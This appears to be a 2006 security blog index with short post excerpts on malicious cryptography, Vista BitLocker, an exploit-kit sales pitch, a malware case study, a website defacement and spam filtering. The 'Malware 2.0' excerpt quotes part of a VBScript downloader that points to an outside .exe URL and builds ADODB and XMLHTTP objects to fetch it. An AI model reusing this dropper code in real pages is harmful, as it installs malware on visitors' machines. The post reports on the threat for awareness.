Of Spam & Men

To content | To menu | To search

Friday 24 November 2006

Malicious crypto: (Ab)use cryptology

This is a very interesting lecture from Frederic Raynal from the french security mag MISC:

Cryptology is everywhere nowadays. Most of the time, people don't even know they are actually using it on a daily basis. In this lecture, we'll show how the crytpography is actually a double edged sword. Despite cryptology's common use as a defensive way by providing primitives like confidentiality and integrity, we'll see to use cryptology for malicious purpose. We use it here to improve target selection during attacks, to save time or to be as sealth as possible.

Continue reading...

Thursday 23 November 2006

Vista's Bitlocker: More security for laptops

Vista's Entreprise and Ultimate editions will introduce a new (for Windows) security feature called BitLocker:

BitLocker Drive Encryption is a data protection feature available in Windows Vista Enterprise and Ultimate for client computers and in Windows Server "Longhorn". BitLocker is Microsoft’s response to one of our top customer requests: address the very real threats of data theft or exposure from lost, stolen or inappropriately decommissioned PC hardware with a tightly integrated solution in the Windows Operating System.

You can configure Vista to require an USB pen key or a flash drive to boot. If the user can't provide the right key, the data on the harddrive stays encrypted and (relatively) secure.

Continue reading...

Malware 2.0: Malware utilizes AJAX to install itself


Well, ok, it's not really AJAX. This malware uses an HTML bit using XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your harddrive:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")

Continue reading...

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker. Web-Attacker is the most popular toolkit for building malicious sites. It's supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the interne browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just provide a malware, a keylogger or whatever you want to infect your visitors with.

Continue reading...

Saturday 18 November 2006

Malware Case Study

Secure Science Corporation and Michael Ligh did a very good job analyzing a malware. Their case study is a very complet and interesting analyze of a yet-to-be-named malware (prg.exe):

This document contains details of an exploratory case study that was conducted on a malware specimen found in the wild by members of the Mal-Aware Group 1 . The trojan was hosted on web servers located in the Ukraine and Russia, and existed among several gigabytes of data encoded with a proprietary algorithm. There were nearly 10,000 individual files available, each containing between 70 bytes and 56 megabytes worth of stolen data that only criminals could read…until now.

Continue reading...

Polish Police Own3d

Looks like one of the polish police's sites (http://www.elblag.policja.gov.pl) was defaced this week by a team nammed "un-root". un-root-logo Zone-h has a mirror of the defacement here

Continue reading...

Thursday 16 November 2006

When spammers get serious

Spammers spam and I make a living stoping spam (well, that's not the only thing i do) and i do it well. At work we use a combination of Spamassassin and CRM114. That's a combination of two different antispam mechanisms:

This system isn't perfect but give pretty good results: 99.6% of the spam that were sent to my addresses were detected. But that was before they started using poisonning methods and captcha images...

Continue reading...

Holly Smoking Latop!

PC Pitshop did an interesting experiment involving a laptop and a explosion prone battery:

Continue reading...

page 3 of 3 -